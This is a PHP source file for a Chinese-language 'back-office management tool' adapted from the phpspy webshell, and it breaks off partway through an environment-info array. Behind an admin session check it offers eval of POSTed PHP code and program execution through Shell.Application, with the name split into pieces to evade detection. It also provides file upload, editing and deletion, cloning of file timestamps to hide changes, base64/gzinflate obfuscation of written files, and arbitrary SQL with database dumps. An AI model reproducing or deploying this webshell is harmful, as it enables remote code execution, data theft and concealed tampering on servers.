<?php
// - SESSION安全检测
@session_start();
if (empty($_SESSION['userid'])) {
	exit('您没有权限进入该页面!!!!');
}

// - 调用配置文件
require_once('../../include/config.php'); // 调用配置文件
require_once('../../include/db_mysql.php'); // 调用数据库类
require_once('../../include/common.inc.php'); // 调用公共配置文件

// - 用户组安全检测
$re01s = $db->query("select uid,username,password,groupid from {$prefix}_members where uid={$_SESSION['userid']}");
$re01r = $db->getarray($re01s);
$re02s = $db->query("select * from {$prefix}_groups where id={$re01r['groupid']}");
$re02r = $db->getarray($re02s);
if ($re02r['manager']!=1) {
	exit('您没有权限进入后台管理系统!!!!');
}

if ($re01r['groupid'] != 1) {
	exit('本插件只有系统管理员才有权执行!!!!');
}

// - 更高权限的安全认证

$MPID = substr(md5($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT'].$safe), 7, 5);
if ($MPID != $_SESSION['MPID']) {
	// 如果正常情况下出现以下警告语句，请将下行注释或者删除
	exit('警告!你的资料已被系统记录，请务非法进入系统!!!!');
}

error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";
// 如果需要密码验证,请修改登陆密码
$admin['pass']  = $filepass;
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no)
$retime = "no";
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定)
$cmd = "cmd.exe";
// 下面是操作信息回显栏平常的内容
$notice = '<table width=98% border=0 cellpadding=0 cellspacing=0><tr><td><b>域名：'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">时间：'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>IP:'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>';
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
	@extract($_POST, EXTR_SKIP);
	@extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");

/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
	if ($_GET['action'] == "logout") {
		setcookie ("adminpass", "");
		echo '<META http-equiv=Content-Type content="text/html; charset=UTF-8">';
		echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
		echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 &gt;&gt;&gt;</a></span>";
		exit;
	}

	if ($_POST['do'] == 'login') {
		$thepass=trim($_POST['adminpass']);
		if ($admin['pass'] == $thepass) {
			setcookie ("adminpass",$thepass,time()+(1*24*3600));
			echo '<META http-equiv=Content-Type content="text/html; charset=UTF-8">';
			echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
			echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 &gt;&gt;&gt;</a></span>";
			exit;
		}
	}
	if (isset($_COOKIE['adminpass'])) {
		if ($_COOKIE['adminpass'] != $admin['pass']) {
			loginpage();
		}
	} else {
		loginpage();
	}
}
/*===================== 验证结束 =====================*/

// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
	$_GET = stripslashes_array($_GET);
	$_POST = stripslashes_array($_POST);
}

// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {
	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
	exit;
}
if($_GET['action'] == "nowuser") {
	$user = get_current_user();
	if(!$user) $user = "报告长官，主机变态，无法获取当前进行用户名！";
	echo"当前进程用户名：$user";
	exit;
}
if(isset($_POST['phpcode'])){
	eval("?".">$_POST[phpcode]<?");
	exit;
}

// 下载文件
if (!empty($downfile)) {
	if (!@file_exists($downfile)) {
		echo "<script>alert('你要下的文件不存在!')</script>";
	} else {
		$filename = basename($downfile);
		$filename_info = explode('.', $filename);
		$fileext = $filename_info[count($filename_info)-1];
		header('Content-type: application/x-'.$fileext);
		header('Content-Disposition: attachment; filename='.$filename);
		header('Content-Description: PHP Generated Data');
		header('Content-Length: '.filesize($downfile));
		@readfile($downfile);
		exit;
	}
}

// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
	@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
	@mysql_select_db($dbname) or die("选择数据库失败");
	$table = array_flip($_POST['table']);
	$result = mysql_query("SHOW tables");
	echo ($result) ? NULL : "出错: ".mysql_error();

	$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
	header('Content-type: application/unknown');
	header('Content-Disposition: attachment; filename='.$filename);
	$mysqldata = '';
	while ($currow = mysql_fetch_array($result)) {
		if (isset($table[$currow[0]])) {
			$mysqldata.= sqldumptable($currow[0]);
			$mysqldata.= $mysqldata."\r\n";
		}
	}
	mysql_close();
	exit;
}

// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));

// 获取当前路径
if (!isset($dir) or empty($dir)) {
	$dir = ".";
	$nowpath = getPath($pathname, $dir);
} else {
	$dir=$_GET['dir'];
	if (!file_exists("$dir")) $dir = ".";
	$nowpath = getPath($pathname, $dir);
}

// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = '';

$tb = new FORMS;

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
<head>
<META http-equiv=Page-Enter content="revealTrans(duration=1.0, transition=12)"/>
<title>PHP后台管理工具</title>
<style type="text/css">
<!--
* {margin: 0;padding:0;}
body{font-family: Verdana, Arial, Helvetica, sans-serif, 宋体;font-size: 12px;color: #3A6EA5;background-color:#E5E5E5;line-height:140%;table-layout:fixed;word-break:break-all;}
.smlfont {font-size:11px;}
input {font-size:11px;BACKGROUND-COLOR: #FFF;height: 18px;border: 1px solid #666;}

.redfont {COLOR:#CA0000;}
a:link,a:visited {font-weight:bold;color:#666}
a:hover{color: #ff0000;text-decoration: none;}
img {border: none;}
.mm{margin:0 auto;width:775px;float:none;BACKGROUND-COLOR: "#000;height:5px;}
.top {BACKGROUND-COLOR: "#CCCCCC;}
.firstalt {BACKGROUND-COLOR: #EFEFEF;}
.secondalt {BACKGROUND-COLOR: #F5F5F5;}
-->
</style>
<SCRIPT language=JavaScript>
<!--
var CheckAll=new Function("form","for (var i=0;i<form.elements.length;i++) {var e = form.elements[i];if (e.name != 'chkall') e.checked = form.chkall.checked;}");
var really=new Function("d","f","m","t","if (confirm(m)) {	if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}");
var show=new Function("oDIV","oDIV.style.display =(oDIV.style.display == \"none\")?\"block\":\"none\";");
//function show(oDIV){oDIV.style.display = (oDIV.style.display == "none") ? "block" : "none";}
-->
</SCRIPT>
</head>
<body><center>
<?php
$tb->tableheader();
$tb->tdbody('<span style="DISPLAY: block; FILTER: glow(color=#FFFFFF,strength=5); COLOR: blue; HEIGHT: 1px; TEXT-ALIGN: center;border: 1px solid #66ccff;"> ╣ 后台管理工具 ╠ </span>');
$tb->tablefooter();

$test = "";
if(!$_GET['dir']) $dir = "./";

$tb->tableheader();
$tb->tdbody('| <a href="?action=logout">注销登录</a> | <a href="?action=dir">Shell 目录</a> | <a href="?action=phpenv">环境变量</a> '.$phpinfo.' |');
$tb->tdbody('| <a href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval">执行php脚本</a> | <a href="?action=sql">执行SQL语句</a> |');
$tb->tablefooter();

/*===================== 执行操作 开始 =====================*/
$tb->tableheader();

// 删除文件
if (!empty($delfile)) {
	if (file_exists($delfile)) $tb->tdbody((@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!");
	else $tb->tdbody(basename($delfile)." 文件已不存在!");
}

// 删除目录
elseif (!empty($deldir)) {
	$deldirs="$dir/$deldir";
	if (!file_exists("$deldirs")) $tb->tdbody("$deldir 目录已不存在!");
	else  $tb->tdbody((deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!");
}

// 创建目录
elseif (($_GET['action']=="dir") and ($_GET['do']=="createdirectory") AND !empty($_GET['newdirectory'])) {
	if (!empty($newdirectory)) {
		$mkdirs="$dir/$newdirectory";
		if (file_exists("$mkdirs")) $tb->tdbody("该目录已存在!");
		else {
			$tb->tdbody((@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!");
			@chmod("$mkdirs",0777);
		}
	}
}

// 上传文件
elseif ($doupfile) {
	$tb->tdbody((@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "文件上传成功!" : "文件上传失败!");
}
// 编辑文件
elseif ($_POST['do'] == 'doeditfile') {
	if (!empty($_POST['editfilename'])) {
		if(!file_exists($editfilename)) unset($retime);
		if($time==$now) $time = @filemtime($editfilename);
		$time2 = @date("Y-m-d H:i:s",$time);
		$filename="$editfilename";
		@$fp=fopen("$filename","w");
		if($_POST['change']=="yes"){
			$filecontent = "?".">".$_POST['filecontent']."<?";
			$filecontent = gzdeflate($filecontent);
			$filecontent = base64_encode($filecontent);
			$filecontent = "<?php\n/*\n代码由浅蓝的辐射鱼加密!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>";
		}else{
			$filecontent = $_POST['filecontent'];
		}
		$tb->tdbody($msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!");
		@fclose($fp);
		if($retime=="yes"){
			$tb->tdbody($msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!");
		}
	} else {
		$tb->tdbody("请输入想要编辑的文件名!");
	}
}
// 编辑文件属性
elseif ($_POST['do'] == 'editfileperm') {
	if (!empty($_POST['fileperm'])) {
		$fileperm=base_convert($_POST['fileperm'],8,10);
		$tb->tdbody((@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!");
		$tb->tdbody(" 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4));
	} else {
		$tb->tdbody("请输入想要设置的属性!");
	}
}

// 文件改名
elseif ($_POST['do'] == 'rename') {
	if (!empty($_POST['newname'])) {
		$newname=$_POST['dir']."/".$_POST['newname'];
		if (@file_exists($newname)) {
			$tb->tdbody("".$_POST['newname']." 已经存在,请重新输入一个!");
		} else {
			$tb->tdbody((@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!");
		}
	} else {
		$tb->tdbody("请输入想要改的文件名!");
	}
}
elseif ($_POST['do'] == 'search') {
	if(!empty($oldkey)){
		$tb->tdbody("<span class=\"redfont\">查找关键词:[".$oldkey."],下面显示查找的结果:");
		if($type2 == "getpath"){
			$tb->tdbody("鼠标移到结果文件上会有部分截取显示.");
		}
		$tb->tdbody("</span><br><hr width=\"775\" noshade>");
		find($path);
	}else{
		$tb->tdbody("你要查虾米?到底要查虾米呢?有没有虾米要你查呢?");
	}
}

// 克隆时间
elseif ($_POST['do'] == 'domodtime') {
	if (!@file_exists($_POST['curfile'])) {
		$tb->tdbody("要修改的文件不存在!");
	} else {
		if (!@file_exists($_POST['tarfile'])) {
			$tb->tdbody("要参照的文件不存在!");
		} else {
			$time=@filemtime($_POST['tarfile']);
			$tb->tdbody((@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!");
		}
	}
}

// 自定义时间
elseif ($_POST['do'] == 'modmytime') {
	if (!@file_exists($_POST['curfile'])) {
		$tb->tdbody("要修改的文件不存在!");
	} else {
		$year=$_POST['year'];
		$month=$_POST['month'];
		$data=$_POST['data'];
		$hour=$_POST['hour'];
		$minute=$_POST['minute'];
		$second=$_POST['second'];
		if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
			$time=strtotime("$data $month $year $hour:$minute:$second");
			$tb->tdbody((@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!");
		}
	}
}

// 连接MYSQL
elseif ($connect) {
	if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
		$tb->tdbody("数据库连接成功!");
		mysql_close();
	} else {
		$tb->tdbody(mysql_error());
	}
}

// 执行SQL语句
elseif ($_POST['do'] == 'query') {
	@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
	@mysql_select_db($dbname) or die("选择数据库失败");
	@mysql_query("set NAMES 'UTF8'");
	$result = @mysql_query($_POST['sql_query']);

	$sqlquery = str_replace("\r", "", $_POST['sql_query']);
	$sqls = split(";[ \t]{0,}\n",$sqlquery);
	$nerrCode = ""; $i=0;
	foreach($sqls as $q){
		$q = trim($q); if($q==""){ continue; }
		$result = @mysql_query($q);
		$i++;
	}

	$tb->tdbody(($result) ? "成功执行{$i}个SQL语句" : "出错: ".mysql_error());
	mysql_close();
}

// 备份操作
elseif ($_POST['do'] == 'backupmysql') {
	if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
		$tb->tdbody("请选择欲备份的数据表和备份方式!");
	} else {
		if ($_POST['backuptype'] == 'server') {
			@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
			@mysql_select_db($dbname) or die("选择数据库失败");
			$table = array_flip($_POST['table']);
			$filehandle = @fopen($path,"w");
			if ($filehandle) {
				$result = mysql_query("SHOW tables");
				$tb->tdbody(($result) ? NULL : "出错: ".mysql_error());
				while ($currow = mysql_fetch_array($result)) {
					if (isset($table[$currow[0]])) {
						sqldumptable($currow[0], $filehandle);
						fwrite($filehandle,"\n\n\n");
					}
				}
				fclose($filehandle);
				$tb->tdbody("数据库已成功备份到 <a href=\"".$path."\" target=\"_blank\">".$path."</a>");
				mysql_close();
			} else {
				$tb->tdbody("备份失败,请确认目标文件夹是否具有可写权限!");
			}
		}
	}
}

// 打包下载 PS:文件太大可能非常慢
// Thx : 小花
elseif($downrar) {
	if (!empty($dl)) {
		$dfiles="";
		foreach ($dl AS $filepath=>$value) {
			$dfiles.=$filepath.",";
		}
		$dfiles=substr($dfiles,0,strlen($dfiles)-1);
		$dl=explode(",",$dfiles);
		$zip=new PHPZip($dl);
		$code=$zip->out;
		header("Content-type: application/octet-stream");
		header("Accept-Ranges: bytes");
		header("Accept-Length: ".strlen($code));
		header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
		$tb->tdbody($code);
		exit;
	} else {
		$tb->tdbody("请选择要打包下载的文件!");
	}
}

// Shell.Application 运行程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
	$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
	$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
	$tb->tdbody(($a=='0') ? "程序已经成功执行!" : "程序运行失败!");
}

// 查看PHP配置参数状况
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
	$tb->tdbody("配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."");
}
else {
	$tb->tdbody($notice);
}
$tb->tablefooter();

/*===================== 执行操作 结束 =====================*/

if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {

	$tb->tableheader();
	$tb->tdbody('<div style="float:left;padding-left:15px;">程序路径: '.$pathname.'</div><div style="float:right;padding-right:15px;">当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath);
	$tb->tdbody('<form action="?dir='.urlencode($dir).'" method="POST" enctype="multipart/form-data"><input name="uploadfile" value="" type="file" size="30">&nbsp;&nbsp;<input name="doupfile" value="上传文件" type="submit"><input name="uploaddir" value="'.$dir.'" type="hidden"></form>');
	$tb->tdbody('<input name="myinput" value="" type="text" size="30">&nbsp;&nbsp;<input name="Input" value="跳转目录" type="button" title="跳转到指定目录，支持绝对路径和相对路径" onclick=window.location.href="?dir="+myinput.value>&nbsp;&nbsp;<input name="Input2" value="新建目录" type="button" title="在当前目录下新建指定目录" onclick=window.location.href="?action=dir&do=createdirectory&newdirectory="+myinput.value>&nbsp;&nbsp;<input name="Input3" value="新建文件" type="button" title="在当前目录下新建指定文件" onclick=window.location.href="?action=editfile&dir='.urlencode($dir).'&newfile="+myinput.value>');
	$tb->tablefooter();

	$tb->tableheader();
?>
  <tr bgcolor="#cccccc">
  <td align="center" nowrap width="27%"><b>文件</b></td>
	<td align="center" nowrap width="16%"><b>创建日期</b></td>
  <td align="center" nowrap width="16%"><b>最后修改</b></td>
  <td align="center" nowrap width="11%"><b>大小</b></td>
  <td align="center" nowrap width="6%"><b>属性</b></td>
  <td align="center" nowrap width="24%"><b>操作</b></td>
  </tr>
<?php
// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
	$filepath="$dir/$file";
	$a=@is_dir($filepath);
	if($a=="1"){
		if($file!=".." && $file!=".")	{
			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
			$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
			echo "<tr class=".getrowbg().">\n";
			echo "  <td align=\"left\" nowrap>[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
			echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
			echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
			echo "  <td align=\"center\" nowrap class=\"smlfont\">&lt;dir&gt;</td>\n";
			echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
			echo "  <td align=\"center\" nowrap>| <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!','1')\">删除</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\">改名</a> |</td>\n";
			echo "</tr>\n";
			$dir_i++;
		} else {
			if($file=="..") {
				echo "<tr class=".getrowbg().">\n";
				echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
				echo "</tr>\n";
			}
		}
	}
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
  <td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
	$filepath="$dir/$file";
	$a=@is_dir($filepath);
	if($a=="0"){
		$size=@filesize($filepath);
		$size=$size/1024 ;
		$size= @number_format($size, 3);
		if (@filectime($filepath) == @filemtime($filepath)) {
			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
		} else {
			$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
			$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
		}
		@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
		echo "<tr class=".getrowbg().">\n";
		echo "  <td align=\"left\" nowrap>";
		echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
		echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
		echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
		echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
		echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
		echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
		echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你确定要删除 $file 文件吗?','2')\">删除</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n";
		echo "</tr>\n";
		$file_i++;
	}
}// while
@closedir($dirs);
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="left"><tr><td align=left>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','选中文件打包下载','','submit').'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6');

echo "</FORM>\n";
echo "</table>\n";
}// end dir

elseif ($_GET['action'] == "editfile") {
	if(empty($newfile)) {
		$filename="$dir/$editfile";
		$fp=@fopen($filename,"r");
		$contents=@fread($fp, filesize($filename));
		@fclose($fp);
		$contents=htmlspecialchars($contents);
	}else{
		$editfile=$newfile;
		$filename = "$dir/$editfile";
	}
	$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
	$tb->tableheader();
	$tb->formheader($action,'新建/编辑文件');
	$tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'这个功能只可以用来加密或是压缩完整的php代码。\\n\\n非php代码或不完整php代码或不支持gzinflate函数请不要使用！\')"> ');
	$tb->tdbody($tb->maketextarea('filecontent',$contents));
	$tb->makehidden('do','doeditfile');
	$tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "rename") {
	$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
	$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
	$tb->tableheader();
	$tb->formheader($action,'修改文件名');
	$tb->makehidden('oldname',$dir."/".$nowfile);
	$tb->makehidden('dir',$dir);
	$tb->tdbody('当前文件名: '.basename($nowfile));
	$tb->tdbody('改名为: '.$tb->makeinput('newname'));
	$tb->makehidden('do','rename');
	$tb->formfooter('1','30');
}//end rename

elseif ($_GET['action'] == "eval") {
	$action = "?dir=".urlencode($dir)."";
	$tb->tableheader();
	$tb->formheader(''.$action.' "target="_blank' ,'执行php脚本');
	$tb->tdbody($tb->maketextarea('phpcode',$contents));
	$tb->formfooter('1','30');

}
elseif ($_GET['action'] == "fileperm") {
	$action = "?dir=".urlencode($dir)."&file=".$file;
	$tb->tableheader();
	$tb->formheader($action,'修改文件属性');
	$tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
	$tb->makehidden('file',$file);
	$tb->makehidden('dir',urlencode($dir));
	$tb->makehidden('do','editfileperm');
	$tb->formfooter('1','30');
}//end fileperm

elseif ($_GET['action'] == "newtime") {
	$action = "?dir=".urlencode($dir);
	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
	$tb->tableheader();
	$tb->formheader($action,'克隆文件最后修改时间');
	$tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30');
	$tb->makehidden('do','domodtime');
	$tb->formfooter('','30');
	$tb->formheader($action,'自定义文件最后修改时间');
	$tb->tdbody('<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left');
	$tb->tdbody('当前文件名: '.$file);
	$tb->makehidden('curfile',$file);
	$tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
	$tb->makehidden('do','modmytime');
	$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "search"){
	$action = '?dir='.$dir.'';
	$tb->tableheader();
	$tb->formheader($action,'文件查找');
	$tb->tdbody('你可以使用本功能查找一个目录下的文件里哪写文件包含着关键词!','center');
	$tb->tdbody('文件位置: '.$tb->makeinput('path',''.$nowpath.'','','text','70').'<br>查找文字:'.$tb->makeinput('oldkey','MYPHP','','text','60').''.$tb->makehidden('do','search').'<br> 是否计算所在行<input type="checkbox" name="type" value="list" onclick="javascript:alert(\'选定此处将会列出关键词在所在文件的多少行,和所在的那文件有多少行进行比对\\n\\n格式为:[所在行/文件总行]例如[12/99],用来进行分析.\\n\\n此功能可能会增加一部分的延时,请考虑使用,没有可读权限将出错!\')"> (此功能和下面一个功能会影响执行速度，所以默认关闭!) <br>适当读取:<input type="checkbox" name="type2" value="getpath" onclick="javascript:alert(\'选定此处将会列出关键词在所在位置及你设定结束区域内的部分字符..\\n\\n采取此功能查找完文件后把鼠标移动到找到的文件名上即可读取分析....\\n\\n此功能可能会增加一部分的延时,请考虑使用,没有可读权限将出错!\')"> 读取关键词前'.$tb->makeinput('beline','0','','text','3').'个字符 '.$tb->makehidden('dir',''.$dir.'').'到关键词后第'.$tb->makeinput('endline','10','','text','3').'个字符... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','开始查找文件','','submit'),'center','1','35');
	echo "</form>";
	$tb->tdbody('请表太大的目录了，慢慢浏览慢慢找好不好嘛.假设选定计算行速度会慢。显示[所在行/总共多少行]','center');
	$tb->tablefooter();
}
elseif ($_GET['action'] == "sql") {
	$action = '?action=sql';

	$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
	$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
	$dbpassword = $_POST['dbpassword'];
	$dbname = $_POST['dbname'];
	$sql_query = $_POST['sql_query'];

	$tb->tableheader();
	$tb->formheader($action,'执行 SQL 语句');
	$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
	$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
	$tb->makehidden('do','query');
	$tb->formfooter('1','30');
}//end sql query

elseif ($_GET['action'] == "phpenv") {
	$user = " <a href=\"?action=nowuser\" target=\"_blank\">以免crush点此获取当前进程用户名</a> ";
	$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
	$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
	if ($dis_func == "") {
		$dis_func = "No";
	}else {
		$dis_func = str_replace(" ","<br>",$dis_func);
		$dis_func = str_replace(",","<br>",$dis_func);
	}
	$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
	$info = array(
	0 => array("当前php进程用户",$user),
	1 => array("服务器操作系统",PHP_OS),
	2 => array("服务器时间",date("Y年m月d日 h:i:s",time())),
	3 => array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
	4 => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
	5 => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
	6 => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
	7 => array("Web服务端口",$_SERVER['SERVER_PORT']),
	8 => array("PHP运行方式",strtoupper(php_sapi_name())),
	9 => array("PHP版本",PHP_VERSION),
	10 => array("运行于安全模式",getphpcfg("safemode")),
	11 => array("服务器管理员",$adminmail),
	12 => array("本文件路径",__FILE__),
	13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")),
	14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")),
	15 => array("显示错误信息 display_errors",getphpcfg("display_errors")),
	16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")),
	17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
	18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")),
	19 => array("POST最大字节数 post_max_size",getphpcfg("post_max_size")),
